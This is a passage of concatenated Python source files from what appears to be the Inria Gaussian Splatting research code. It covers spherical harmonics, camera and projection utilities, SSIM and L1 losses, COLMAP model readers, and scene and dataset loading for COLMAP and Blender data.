1.445305721320277, -0.5900435899266435 ] C4 = [ 2.5033429417967046, -1.7701307697799304, 0.9461746957575601, -0.6690465435572892, 0.10578554691520431, -0.6690465435572892, 0.47308734787878004, -1.7701307697799304, 0.6258357354491761, ] def eval_sh(deg, sh, dirs): """ Evaluate spherical harmonics at unit directions using hardcoded SH polynomials. Works with torch/np/jnp. ... Can be 0 or more batch dimensions. Args: deg: int SH deg. 
Currently, 0-3 supported sh: jnp.ndarray SH coeffs [..., C, (deg + 1) ** 2] dirs: jnp.ndarray unit directions [..., 3] Returns: [..., C] """ assert deg <= 4 and deg >= 0 coeff = (deg + 1) ** 2 assert sh.shape[-1] >= coeff result = C0 * sh[..., 0] if deg > 0: x, y, z = dirs[..., 0:1], dirs[..., 1:2], dirs[..., 2:3] result = (result - C1 * y * sh[..., 1] + C1 * z * sh[..., 2] - C1 * x * sh[..., 3]) if deg > 1: xx, yy, zz = x * x, y * y, z * z xy, yz, xz = x * y, y * z, x * z result = (result + C2[0] * xy * sh[..., 4] + C2[1] * yz * sh[..., 5] + C2[2] * (2.0 * zz - xx - yy) * sh[..., 6] + C2[3] * xz * sh[..., 7] + C2[4] * (xx - yy) * sh[..., 8]) if deg > 2: result = (result + C3[0] * y * (3 * xx - yy) * sh[..., 9] + C3[1] * xy * z * sh[..., 10] + C3[2] * y * (4 * zz - xx - yy)* sh[..., 11] + C3[3] * z * (2 * zz - 3 * xx - 3 * yy) * sh[..., 12] + C3[4] * x * (4 * zz - xx - yy) * sh[..., 13] + C3[5] * z * (xx - yy) * sh[..., 14] + C3[6] * x * (xx - 3 * yy) * sh[..., 15]) if deg > 3: result = (result + C4[0] * xy * (xx - yy) * sh[..., 16] + C4[1] * yz * (3 * xx - yy) * sh[..., 17] + C4[2] * xy * (7 * zz - 1) * sh[..., 18] + C4[3] * yz * (7 * zz - 3) * sh[..., 19] + C4[4] * (zz * (35 * zz - 30) + 3) * sh[..., 20] + C4[5] * xz * (7 * zz - 3) * sh[..., 21] + C4[6] * (xx - yy) * (7 * zz - 1) * sh[..., 22] + C4[7] * xz * (xx - 3 * yy) * sh[..., 23] + C4[8] * (xx * (xx - 3 * yy) - yy * (3 * xx - yy)) * sh[..., 24]) return result def RGB2SH(rgb): return (rgb - 0.5) / C0 def SH2RGB(sh): return sh * C0 + 0.5 File: utils/camera_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # from scene.cameras import Camera import numpy as np from utils.general_utils import PILtoTorch from utils.graphics_utils import fov2focal WARNED = False def loadCam(args, id, cam_info, resolution_scale): orig_w, orig_h = cam_info.image.size if args.resolution in [1, 2, 4, 8]: resolution = round(orig_w/(resolution_scale * args.resolution)), round(orig_h/(resolution_scale * args.resolution)) else: # should be a type that converts to float if args.resolution == -1: if orig_w > 1600: global WARNED if not WARNED: print("[ INFO ] Encountered quite large input images (>1.6K pixels width), rescaling to 1.6K.\n " "If this is not desired, please explicitly specify '--resolution/-r' as 1") WARNED = True global_down = orig_w / 1600 else: global_down = 1 else: global_down = orig_w / args.resolution scale = float(global_down) * float(resolution_scale) resolution = (int(orig_w / scale), int(orig_h / scale)) resized_image_rgb = PILtoTorch(cam_info.image, resolution) gt_image = resized_image_rgb[:3, ...] loaded_mask = None if resized_image_rgb.shape[1] == 4: loaded_mask = resized_image_rgb[3:4, ...] 
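    # Wrap the resized RGB image (and optional alpha mask) in a Camera object on the configured data device.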
return Camera(colmap_id=cam_info.uid, R=cam_info.R, T=cam_info.T, FoVx=cam_info.FovX, FoVy=cam_info.FovY, image=gt_image, gt_alpha_mask=loaded_mask, image_name=cam_info.image_name, uid=id, data_device=args.data_device) def cameraList_from_camInfos(cam_infos, resolution_scale, args): camera_list = [] for id, c in enumerate(cam_infos): camera_list.append(loadCam(args, id, c, resolution_scale)) return camera_list def camera_to_JSON(id, camera : Camera): Rt = np.zeros((4, 4)) Rt[:3, :3] = camera.R.transpose() Rt[:3, 3] = camera.T Rt[3, 3] = 1.0 W2C = np.linalg.inv(Rt) pos = W2C[:3, 3] rot = W2C[:3, :3] serializable_array_2d = [x.tolist() for x in rot] camera_entry = { 'id' : id, 'img_name' : camera.image_name, 'width' : camera.width, 'height' : camera.height, 'position': pos.tolist(), 'rotation': serializable_array_2d, 'fy' : fov2focal(camera.FovY, camera.height), 'fx' : fov2focal(camera.FovX, camera.width) } return camera_entry File: utils/system_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # from errno import EEXIST from os import makedirs, path import os def mkdir_p(folder_path): # Creates a directory. equivalent to using mkdir -p on the command line try: makedirs(folder_path) except OSError as exc: # Python >2.5 if exc.errno == EEXIST and path.isdir(folder_path): pass else: raise def searchForMaxIteration(folder): saved_iters = [int(fname.split("_")[-1]) for fname in os.listdir(folder)] return max(saved_iters) File: utils/graphics_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import torch import math import numpy as np from typing import NamedTuple class BasicPointCloud(NamedTuple): points : np.array colors : np.array normals : np.array def geom_transform_points(points, transf_matrix): P, _ = points.shape ones = torch.ones(P, 1, dtype=points.dtype, device=points.device) points_hom = torch.cat([points, ones], dim=1) points_out = torch.matmul(points_hom, transf_matrix.unsqueeze(0)) denom = points_out[..., 3:] + 0.0000001 return (points_out[..., :3] / denom).squeeze(dim=0) def getWorld2View(R, t): Rt = np.zeros((4, 4)) Rt[:3, :3] = R.transpose() Rt[:3, 3] = t Rt[3, 3] = 1.0 return np.float32(Rt) def getWorld2View2(R, t, translate=np.array([.0, .0, .0]), scale=1.0): Rt = np.zeros((4, 4)) Rt[:3, :3] = R.transpose() Rt[:3, 3] = t Rt[3, 3] = 1.0 C2W = np.linalg.inv(Rt) cam_center = C2W[:3, 3] cam_center = (cam_center + translate) * scale C2W[:3, 3] = cam_center Rt = np.linalg.inv(C2W) return np.float32(Rt) def getProjectionMatrix(znear, zfar, fovX, fovY): tanHalfFovY = math.tan((fovY / 2)) tanHalfFovX = math.tan((fovX / 2)) top = tanHalfFovY * znear bottom = -top right = tanHalfFovX * znear left = -right P = torch.zeros(4, 4) z_sign = 1.0 P[0, 0] = 2.0 * znear / (right - left) P[1, 1] = 2.0 * znear / (top - bottom) P[0, 2] = (right + left) / (right - left) P[1, 2] = (top + bottom) / (top - bottom) P[3, 2] = z_sign P[2, 2] = z_sign * zfar / (zfar - znear) P[2, 3] = -(zfar * znear) / (zfar - znear) return P def fov2focal(fov, pixels): return pixels / (2 * math.tan(fov / 2)) def focal2fov(focal, pixels): return 2*math.atan(pixels/(2*focal)) File: utils/loss_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import torch import torch.nn.functional as F from torch.autograd import Variable from math import exp def l1_loss(network_output, gt): return torch.abs((network_output - gt)).mean() def l2_loss(network_output, gt): return ((network_output - gt) ** 2).mean() def gaussian(window_size, sigma): gauss = torch.Tensor([exp(-(x - window_size // 2) ** 2 / float(2 * sigma ** 2)) for x in range(window_size)]) return gauss / gauss.sum() def create_window(window_size, channel): _1D_window = gaussian(window_size, 1.5).unsqueeze(1) _2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0) window = Variable(_2D_window.expand(channel, 1, window_size, window_size).contiguous()) return window def ssim(img1, img2, window_size=11, size_average=True): channel = img1.size(-3) window = create_window(window_size, channel) if img1.is_cuda: window = window.cuda(img1.get_device()) window = window.type_as(img1) return _ssim(img1, img2, window, window_size, channel, size_average) def _ssim(img1, img2, window, window_size, channel, size_average=True): mu1 = F.conv2d(img1, window, padding=window_size // 2, groups=channel) mu2 = F.conv2d(img2, window, padding=window_size // 2, groups=channel) mu1_sq = mu1.pow(2) mu2_sq = mu2.pow(2) mu1_mu2 = mu1 * mu2 sigma1_sq = F.conv2d(img1 * img1, window, padding=window_size // 2, groups=channel) - mu1_sq sigma2_sq = F.conv2d(img2 * img2, window, padding=window_size // 2, groups=channel) - mu2_sq sigma12 = F.conv2d(img1 * img2, window, padding=window_size // 2, groups=channel) - mu1_mu2 C1 = 0.01 ** 2 C2 = 0.03 ** 2 ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2)) if size_average: return ssim_map.mean() else: return ssim_map.mean(1).mean(1).mean(1) File: scene/__init__.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import os import random import json from utils.system_utils import searchForMaxIteration from scene.dataset_readers import sceneLoadTypeCallbacks from scene.gaussian_model import GaussianModel from arguments import ModelParams from utils.camera_utils import cameraList_from_camInfos, camera_to_JSON class Scene: gaussians : GaussianModel def __init__(self, args : ModelParams, gaussians : GaussianModel, load_iteration=None, shuffle=True, resolution_scales=[1.0]): """b :param path: Path to colmap scene main folder. """ self.model_path = args.model_path self.loaded_iter = None self.gaussians = gaussians if load_iteration: if load_iteration == -1: self.loaded_iter = searchForMaxIteration(os.path.join(self.model_path, "point_cloud")) else: self.loaded_iter = load_iteration print("Loading trained model at iteration {}".format(self.loaded_iter)) self.train_cameras = {} self.test_cameras = {} if os.path.exists(os.path.join(args.source_path, "sparse")): scene_info = sceneLoadTypeCallbacks["Colmap"](args.source_path, args.images, args.eval) elif os.path.exists(os.path.join(args.source_path, "transforms_train.json")): print("Found transforms_train.json file, assuming Blender data set!") scene_info = sceneLoadTypeCallbacks["Blender"](args.source_path, args.white_background, args.eval) else: assert False, "Could not recognize scene type!" 
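        # First-time setup (no checkpoint loaded yet): copy the input point cloud to the model directory and dump per-camera metadata to cameras.json.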
if not self.loaded_iter: with open(scene_info.ply_path, 'rb') as src_file, open(os.path.join(self.model_path, "input.ply") , 'wb') as dest_file: dest_file.write(src_file.read()) json_cams = [] camlist = [] if scene_info.test_cameras: camlist.extend(scene_info.test_cameras) if scene_info.train_cameras: camlist.extend(scene_info.train_cameras) for id, cam in enumerate(camlist): json_cams.append(camera_to_JSON(id, cam)) with open(os.path.join(self.model_path, "cameras.json"), 'w') as file: json.dump(json_cams, file) if shuffle: random.shuffle(scene_info.train_cameras) # Multi-res consistent random shuffling random.shuffle(scene_info.test_cameras) # Multi-res consistent random shuffling self.cameras_extent = scene_info.nerf_normalization["radius"] for resolution_scale in resolution_scales: print("Loading Training Cameras") self.train_cameras[resolution_scale] = cameraList_from_camInfos(scene_info.train_cameras, resolution_scale, args) print("Loading Test Cameras") self.test_cameras[resolution_scale] = cameraList_from_camInfos(scene_info.test_cameras, resolution_scale, args) if self.loaded_iter: self.gaussians.load_ply(os.path.join(self.model_path, "point_cloud", "iteration_" + str(self.loaded_iter), "point_cloud.ply")) else: self.gaussians.create_from_pcd(scene_info.point_cloud, self.cameras_extent) def save(self, iteration): point_cloud_path = os.path.join(self.model_path, "point_cloud/iteration_{}".format(iteration)) self.gaussians.save_ply(os.path.join(point_cloud_path, "point_cloud.ply")) def getTrainCameras(self, scale=1.0): return self.train_cameras[scale] def getTestCameras(self, scale=1.0): return self.test_cameras[scale] File: scene/colmap_loader.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import numpy as np import collections import struct CameraModel = collections.namedtuple( "CameraModel", ["model_id", "model_name", "num_params"]) Camera = collections.namedtuple( "Camera", ["id", "model", "width", "height", "params"]) BaseImage = collections.namedtuple( "Image", ["id", "qvec", "tvec", "camera_id", "name", "xys", "point3D_ids"]) Point3D = collections.namedtuple( "Point3D", ["id", "xyz", "rgb", "error", "image_ids", "point2D_idxs"]) CAMERA_MODELS = { CameraModel(model_id=0, model_name="SIMPLE_PINHOLE", num_params=3), CameraModel(model_id=1, model_name="PINHOLE", num_params=4), CameraModel(model_id=2, model_name="SIMPLE_RADIAL", num_params=4), CameraModel(model_id=3, model_name="RADIAL", num_params=5), CameraModel(model_id=4, model_name="OPENCV", num_params=8), CameraModel(model_id=5, model_name="OPENCV_FISHEYE", num_params=8), CameraModel(model_id=6, model_name="FULL_OPENCV", num_params=12), CameraModel(model_id=7, model_name="FOV", num_params=5), CameraModel(model_id=8, model_name="SIMPLE_RADIAL_FISHEYE", num_params=4), CameraModel(model_id=9, model_name="RADIAL_FISHEYE", num_params=5), CameraModel(model_id=10, model_name="THIN_PRISM_FISHEYE", num_params=12) } CAMERA_MODEL_IDS = dict([(camera_model.model_id, camera_model) for camera_model in CAMERA_MODELS]) CAMERA_MODEL_NAMES = dict([(camera_model.model_name, camera_model) for camera_model in CAMERA_MODELS]) def qvec2rotmat(qvec): return np.array([ [1 - 2 * qvec[2]**2 - 2 * qvec[3]**2, 2 * qvec[1] * qvec[2] - 2 * qvec[0] * qvec[3], 2 * qvec[3] * qvec[1] + 2 * qvec[0] * qvec[2]], [2 * qvec[1] * qvec[2] + 2 * qvec[0] * qvec[3], 1 - 2 * qvec[1]**2 - 2 * qvec[3]**2, 2 * qvec[2] * qvec[3] - 2 * qvec[0] * qvec[1]], [2 * qvec[3] * qvec[1] - 2 * qvec[0] * qvec[2], 2 * qvec[2] * qvec[3] + 2 * qvec[0] * qvec[1], 1 - 2 * qvec[1]**2 - 2 * qvec[2]**2]]) def rotmat2qvec(R): Rxx, Ryx, Rzx, Rxy, Ryy, Rzy, Rxz, Ryz, Rzz = R.flat K = np.array([ [Rxx - Ryy - Rzz, 0, 0, 0], [Ryx + Rxy, Ryy - Rxx - Rzz, 0, 0], [Rzx + Rxz, Rzy + Ryz, Rzz - Rxx - Ryy, 0], [Ryz - Rzy, Rzx - Rxz, Rxy - Ryx, Rxx + Ryy + Rzz]]) / 3.0 eigvals, eigvecs = np.linalg.eigh(K) qvec = eigvecs[[3, 0, 1, 2], np.argmax(eigvals)] if qvec[0] < 0: qvec *= -1 return qvec class Image(BaseImage): def qvec2rotmat(self): return qvec2rotmat(self.qvec) def read_next_bytes(fid, num_bytes, format_char_sequence, endian_character="<"): """Read and unpack the next bytes from a binary file. :param fid: :param num_bytes: Sum of combination of {2, 4, 8}, e.g. 2, 6, 16, 30, etc. :param format_char_sequence: List of {c, e, f, d, h, H, i, I, l, L, q, Q}. :param endian_character: Any of {@, =, <, >, !} :return: Tuple of read and unpacked values. 
""" data = fid.read(num_bytes) return struct.unpack(endian_character + format_char_sequence, data) def read_points3D_text(path): """ see: src/base/reconstruction.cc void Reconstruction::ReadPoints3DText(const std::string& path) void Reconstruction::WritePoints3DText(const std::string& path) """ xyzs = None rgbs = None errors = None num_points = 0 with open(path, "r") as fid: while True: line = fid.readline() if not line: break line = line.strip() if len(line) > 0 and line[0] != "#": num_points += 1 xyzs = np.empty((num_points, 3)) rgbs = np.empty((num_points, 3)) errors = np.empty((num_points, 1)) count = 0 with open(path, "r") as fid: while True: line = fid.readline() if not line: break line = line.strip() if len(line) > 0 and line[0] != "#": elems = line.split() xyz = np.array(tuple(map(float, elems[1:4]))) rgb = np.array(tuple(map(int, elems[4:7]))) error = np.array(float(elems[7])) xyzs[count] = xyz rgbs[count] = rgb errors[count] = error count += 1 return xyzs, rgbs, errors def read_points3D_binary(path_to_model_file): """ see: src/base/reconstruction.cc void Reconstruction::ReadPoints3DBinary(const std::string& path) void Reconstruction::WritePoints3DBinary(const std::string& path) """ with open(path_to_model_file, "rb") as fid: num_points = read_next_bytes(fid, 8, "Q")[0] xyzs = np.empty((num_points, 3)) rgbs = np.empty((num_points, 3)) errors = np.empty((num_points, 1)) for p_id in range(num_points): binary_point_line_properties = read_next_bytes( fid, num_bytes=43, format_char_sequence="QdddBBBd") xyz = np.array(binary_point_line_properties[1:4]) rgb = np.array(binary_point_line_properties[4:7]) error = np.array(binary_point_line_properties[7]) track_length = read_next_bytes( fid, num_bytes=8, format_char_sequence="Q")[0] track_elems = read_next_bytes( fid, num_bytes=8*track_length, format_char_sequence="ii"*track_length) xyzs[p_id] = xyz rgbs[p_id] = rgb errors[p_id] = error return xyzs, rgbs, errors def read_intrinsics_text(path): """ Taken from https://github.com/colmap/colmap/blob/dev/scripts/python/read_write_model.py """ cameras = {} with open(path, "r") as fid: while True: line = fid.readline() if not line: break line = line.strip() if len(line) > 0 and line[0] != "#": elems = line.split() camera_id = int(elems[0]) model = elems[1] assert model == "PINHOLE", "While the loader support other types, the rest of the code assumes PINHOLE" width = int(elems[2]) height = int(elems[3]) params = np.array(tuple(map(float, elems[4:]))) cameras[camera_id] = Camera(id=camera_id, model=model, width=width, height=height, params=params) return cameras def read_extrinsics_binary(path_to_model_file): """ see: src/base/reconstruction.cc void Reconstruction::ReadImagesBinary(const std::string& path) void Reconstruction::WriteImagesBinary(const std::string& path) """ images = {} with open(path_to_model_file, "rb") as fid: num_reg_images = read_next_bytes(fid, 8, "Q")[0] for _ in range(num_reg_images): binary_image_properties = read_next_bytes( fid, num_bytes=64, format_char_sequence="idddddddi") image_id = binary_image_properties[0] qvec = np.array(binary_image_properties[1:5]) tvec = np.array(binary_image_properties[5:8]) camera_id = binary_image_properties[8] image_name = "" current_char = read_next_bytes(fid, 1, "c")[0] while current_char != b"\x00": # look for the ASCII 0 entry image_name += current_char.decode("utf-8") current_char = read_next_bytes(fid, 1, "c")[0] num_points2D = read_next_bytes(fid, num_bytes=8, format_char_sequence="Q")[0] x_y_id_s = read_next_bytes(fid, 
num_bytes=24*num_points2D, format_char_sequence="ddq"*num_points2D) xys = np.column_stack([tuple(map(float, x_y_id_s[0::3])), tuple(map(float, x_y_id_s[1::3]))]) point3D_ids = np.array(tuple(map(int, x_y_id_s[2::3]))) images[image_id] = Image( id=image_id, qvec=qvec, tvec=tvec, camera_id=camera_id, name=image_name, xys=xys, point3D_ids=point3D_ids) return images def read_intrinsics_binary(path_to_model_file): """ see: src/base/reconstruction.cc void Reconstruction::WriteCamerasBinary(const std::string& path) void Reconstruction::ReadCamerasBinary(const std::string& path) """ cameras = {} with open(path_to_model_file, "rb") as fid: num_cameras = read_next_bytes(fid, 8, "Q")[0] for _ in range(num_cameras): camera_properties = read_next_bytes( fid, num_bytes=24, format_char_sequence="iiQQ") camera_id = camera_properties[0] model_id = camera_properties[1] model_name = CAMERA_MODEL_IDS[camera_properties[1]].model_name width = camera_properties[2] height = camera_properties[3] num_params = CAMERA_MODEL_IDS[model_id].num_params params = read_next_bytes(fid, num_bytes=8*num_params, format_char_sequence="d"*num_params) cameras[camera_id] = Camera(id=camera_id, model=model_name, width=width, height=height, params=np.array(params)) assert len(cameras) == num_cameras return cameras def read_extrinsics_text(path): """ Taken from https://github.com/colmap/colmap/blob/dev/scripts/python/read_write_model.py """ images = {} with open(path, "r") as fid: while True: line = fid.readline() if not line: break line = line.strip() if len(line) > 0 and line[0] != "#": elems = line.split() image_id = int(elems[0]) qvec = np.array(tuple(map(float, elems[1:5]))) tvec = np.array(tuple(map(float, elems[5:8]))) camera_id = int(elems[8]) image_name = elems[9] elems = fid.readline().split() xys = np.column_stack([tuple(map(float, elems[0::3])), tuple(map(float, elems[1::3]))]) point3D_ids = np.array(tuple(map(int, elems[2::3]))) images[image_id] = Image( id=image_id, qvec=qvec, tvec=tvec, camera_id=camera_id, name=image_name, xys=xys, point3D_ids=point3D_ids) return images def read_colmap_bin_array(path): """ Taken from https://github.com/colmap/colmap/blob/dev/scripts/python/read_dense.py :param path: path to the colmap binary file. :return: nd array with the floating point values in the value """ with open(path, "rb") as fid: width, height, channels = np.genfromtxt(fid, delimiter="&", max_rows=1, usecols=(0, 1, 2), dtype=int) fid.seek(0) num_delimiter = 0 byte = fid.read(1) while True: if byte == b"&": num_delimiter += 1 if num_delimiter >= 3: break byte = fid.read(1) array = np.fromfile(fid, np.float32) array = array.reshape((width, height, channels), order="F") return np.transpose(array, (1, 0, 2)).squeeze() File: scene/cameras.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import torch from torch import nn import numpy as np from utils.graphics_utils import getWorld2View2, getProjectionMatrix class Camera(nn.Module): def __init__(self, colmap_id, R, T, FoVx, FoVy, image, gt_alpha_mask, image_name, uid, trans=np.array([0.0, 0.0, 0.0]), scale=1.0, data_device = "cuda" ): super(Camera, self).__init__() self.uid = uid self.colmap_id = colmap_id self.R = R self.T = T self.FoVx = FoVx self.FoVy = FoVy self.image_name = image_name try: self.data_device = torch.device(data_device) except Exception as e: print(e) print(f"[Warning] Custom device {data_device} failed, fallback to default cuda device" ) self.data_device = torch.device("cuda") self.original_image = image.clamp(0.0, 1.0).to(self.data_device) self.image_width = self.original_image.shape[2] self.image_height = self.original_image.shape[1] if gt_alpha_mask is not None: self.original_image *= gt_alpha_mask.to(self.data_device) else: self.original_image *= torch.ones((1, self.image_height, self.image_width), device=self.data_device) self.zfar = 100.0 self.znear = 0.01 self.trans = trans self.scale = scale self.world_view_transform = torch.tensor(getWorld2View2(R, T, trans, scale)).transpose(0, 1).cuda() self.projection_matrix = getProjectionMatrix(znear=self.znear, zfar=self.zfar, fovX=self.FoVx, fovY=self.FoVy).transpose(0,1).cuda() self.full_proj_transform = (self.world_view_transform.unsqueeze(0).bmm(self.projection_matrix.unsqueeze(0))).squeeze(0) self.camera_center = self.world_view_transform.inverse()[3, :3] class MiniCam: def __init__(self, width, height, fovy, fovx, znear, zfar, world_view_transform, full_proj_transform): self.image_width = width self.image_height = height self.FoVy = fovy self.FoVx = fovx self.znear = znear self.zfar = zfar self.world_view_transform = world_view_transform self.full_proj_transform = full_proj_transform view_inv = torch.inverse(self.world_view_transform) self.camera_center = view_inv[3][:3] File: scene/dataset_readers.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. 
# # For inquiries contact [email protected] # import os import sys from PIL import Image from typing import NamedTuple from scene.colmap_loader import read_extrinsics_text, read_intrinsics_text, qvec2rotmat, \ read_extrinsics_binary, read_intrinsics_binary, read_points3D_binary, read_points3D_text from utils.graphics_utils import getWorld2View2, focal2fov, fov2focal import numpy as np import json from pathlib import Path from plyfile import PlyData, PlyElement from utils.sh_utils import SH2RGB from scene.gaussian_model import BasicPointCloud class CameraInfo(NamedTuple): uid: int R: np.array T: np.array FovY: np.array FovX: np.array image: np.array image_path: str image_name: str width: int height: int class SceneInfo(NamedTuple): point_cloud: BasicPointCloud train_cameras: list test_cameras: list nerf_normalization: dict ply_path: str def getNerfppNorm(cam_info): def get_center_and_diag(cam_centers): cam_centers = np.hstack(cam_centers) avg_cam_center = np.mean(cam_centers, axis=1, keepdims=True) center = avg_cam_center dist = np.linalg.norm(cam_centers - center, axis=0, keepdims=True) diagonal = np.max(dist) return center.flatten(), diagonal cam_centers = [] for cam in cam_info: W2C = getWorld2View2(cam.R, cam.T) C2W = np.linalg.inv(W2C) cam_centers.append(C2W[:3, 3:4]) center, diagonal = get_center_and_diag(cam_centers) radius = diagonal * 1.1 translate = -center return {"translate": translate, "radius": radius} def readColmapCameras(cam_extrinsics, cam_intrinsics, images_folder): cam_infos = [] for idx, key in enumerate(cam_extrinsics): sys.stdout.write('\r') # the exact output you're looking for: sys.stdout.write("Reading camera {}/{}".format(idx+1, len(cam_extrinsics))) sys.stdout.flush() extr = cam_extrinsics[key] intr = cam_intrinsics[extr.camera_id] height = intr.height width = intr.width uid = intr.id R = np.transpose(qvec2rotmat(extr.qvec)) T = np.array(extr.tvec) if intr.model=="SIMPLE_PINHOLE": focal_length_x = intr.params[0] FovY = focal2fov(focal_length_x, height) FovX = focal2fov(focal_length_x, width) elif intr.model=="PINHOLE": focal_length_x = intr.params[0] focal_length_y = intr.params[1] FovY = focal2fov(focal_length_y, height) FovX = focal2fov(focal_length_x, width) else: assert False, "Colmap camera model not handled: only undistorted datasets (PINHOLE or SIMPLE_PINHOLE cameras) supported!" 
image_path = os.path.join(images_folder, os.path.basename(extr.name)) image_name = os.path.basename(image_path).split(".")[0] image = Image.open(image_path) cam_info = CameraInfo(uid=uid, R=R, T=T, FovY=FovY, FovX=FovX, image=image, image_path=image_path, image_name=image_name, width=width, height=height) cam_infos.append(cam_info) sys.stdout.write('\n') return cam_infos def fetchPly(path): plydata = PlyData.read(path) vertices = plydata['vertex'] positions = np.vstack([vertices['x'], vertices['y'], vertices['z']]).T colors = np.vstack([vertices['red'], vertices['green'], vertices['blue']]).T / 255.0 normals = np.vstack([vertices['nx'], vertices['ny'], vertices['nz']]).T return BasicPointCloud(points=positions, colors=colors, normals=normals) def storePly(path, xyz, rgb): # Define the dtype for the structured array dtype = [('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('nx', 'f4'), ('ny', 'f4'), ('nz', 'f4'), ('red', 'u1'), ('green', 'u1'), ('blue', 'u1')] normals = np.zeros_like(xyz) elements = np.empty(xyz.shape[0], dtype=dtype) attributes = np.concatenate((xyz, normals, rgb), axis=1) elements[:] = list(map(tuple, attributes)) # Create the PlyData object and write to file vertex_element = PlyElement.describe(elements, 'vertex') ply_data = PlyData([vertex_element]) ply_data.write(path) def readColmapSceneInfo(path, images, eval, llffhold=8): try: cameras_extrinsic_file = os.path.join(path, "sparse/0", "images.bin") cameras_intrinsic_file = os.path.join(path, "sparse/0", "cameras.bin") cam_extrinsics = read_extrinsics_binary(cameras_extrinsic_file) cam_intrinsics = read_intrinsics_binary(cameras_intrinsic_file) except: cameras_extrinsic_file = os.path.join(path, "sparse/0", "images.txt") cameras_intrinsic_file = os.path.join(path, "sparse/0", "cameras.txt") cam_extrinsics = read_extrinsics_text(cameras_extrinsic_file) cam_intrinsics = read_intrinsics_text(cameras_intrinsic_file) reading_dir = "images" if images == None else images cam_infos_unsorted = readColmapCameras(cam_extrinsics=cam_extrinsics, cam_intrinsics=cam_intrinsics, images_folder=os.path.join(path, reading_dir)) cam_infos = sorted(cam_infos_unsorted.copy(), key = lambda x : x.image_name) if eval: train_cam_infos = [c for idx, c in enumerate(cam_infos) if idx % llffhold != 0] test_cam_infos = [c for idx, c in enumerate(cam_infos) if idx % llffhold == 0] else: train_cam_infos = cam_infos test_cam_infos = [] nerf_normalization = getNerfppNorm(train_cam_infos) ply_path = os.path.join(path, "sparse/0/points3D.ply") bin_path = os.path.join(path, "sparse/0/points3D.bin") txt_path = os.path.join(path, "sparse/0/points3D.txt") if not os.path.exists(ply_path): print("Converting point3d.bin to .ply, will happen only the first time you open the scene.") try: xyz, rgb, _ = read_points3D_binary(bin_path) except: xyz, rgb, _ = read_points3D_text(txt_path) storePly(ply_path, xyz, rgb) try: pcd = fetchPly(ply_path) except: pcd = None scene_info = SceneInfo(point_cloud=pcd, train_cameras=train_cam_infos, test_cameras=test_cam_infos, nerf_normalization=nerf_normalization, ply_path=ply_path) return scene_info def readCamerasFromTransforms(path, transformsfile, white_background, extension=".png"): cam_infos = [] with open(os.path.join(path, transformsfile)) as json_file: contents = json.load(json_file) fovx = contents["camera_angle_x"] frames = contents["frames"] for idx, frame in enumerate(frames): cam_name = os.path.join(path, frame["file_path"] + extension) # NeRF 'transform_matrix' is a camera-to-world transform c2w = 
np.array(frame["transform_matrix"]) # change from OpenGL/Blender camera axes (Y up, Z back) to COLMAP (Y down, Z forward) c2w[:3, 1:3] *= -1 # get the world-to-camera transform and set R, T w2c = np.linalg.inv(c2w) R = np.transpose(w2c[:3,:3]) # R is stored transposed due to 'glm' in CUDA code T = w2c[:3, 3] image_path = os.path.join(path, cam_name) image_name = Path(cam_name).stem image = Image.open(image_path) im_data = np.array(image.convert("RGBA")) bg = np.array([1,1,1]) if white_background else np.array([0, 0, 0]) norm_data = im_data / 255.0 arr = norm_data[:,:,:3] * norm_data[:, :, 3:4] + bg * (1 - norm_data[:, :, 3:4]) image = Image.fromarray(np.array(arr*255.0, dtype=np.byte), "RGB") fovy = focal2fov(fov2focal(fovx, image.size[0]), image.size[1]) FovY = fovy FovX = fovx cam_infos.append(CameraInfo(uid=idx, R=R, T=T, FovY=FovY, FovX=FovX, image=image, image_path=image_path, image_name=image_name, width=image.size[0], height=image.size[1])) return cam_infos def readNerfSyntheticInfo(path, white_background, eval, extension=".png"): print("Reading Training Transforms") train_cam_infos = readCamerasFromTransforms(path, "transforms_train.json", white_background, extension) print("Reading Test Transforms") test_cam_infos = readCamerasFromTransforms(path, "transforms_test.json", white_background, extension) if not eval: train_cam_infos.extend(test_cam_infos) test_cam_infos = [] nerf_normalization = getNerfppNorm(train_cam_infos) ply_path = os.path.join(path, "points3d.ply") if not os.path.exists(ply_path): # Since this data set has no colmap data, we start with random points num_pts = 100_000 print(f"Generating random point cloud ({num_pts})...") # We create random points inside the bounds of the synthetic Blender scenes xyz = np.random.random((num_pts, 3)) * 2.6 - 1.3 shs = np.random.random((num_pts, 3)) / 255.0 pcd = BasicPointCloud(points=xyz, colors=SH2RGB(shs), normals=np.zeros((num_pts, 3))) storePly(ply_path, xyz, SH2RGB(shs) * 255) try: pcd = fetchPly(ply_path) except: pcd = None scene_info = SceneInfo(point_cloud=pcd, train_cameras=train_cam_infos, test_cameras=test_cam_infos, 